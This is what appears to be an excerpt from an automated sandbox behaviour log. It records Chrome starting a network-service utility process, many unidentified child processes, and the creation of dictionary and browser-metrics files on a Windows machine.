Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,2893178873461922982,2517917473115045809,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1556 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-627EE0C7-1BFC.pma
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic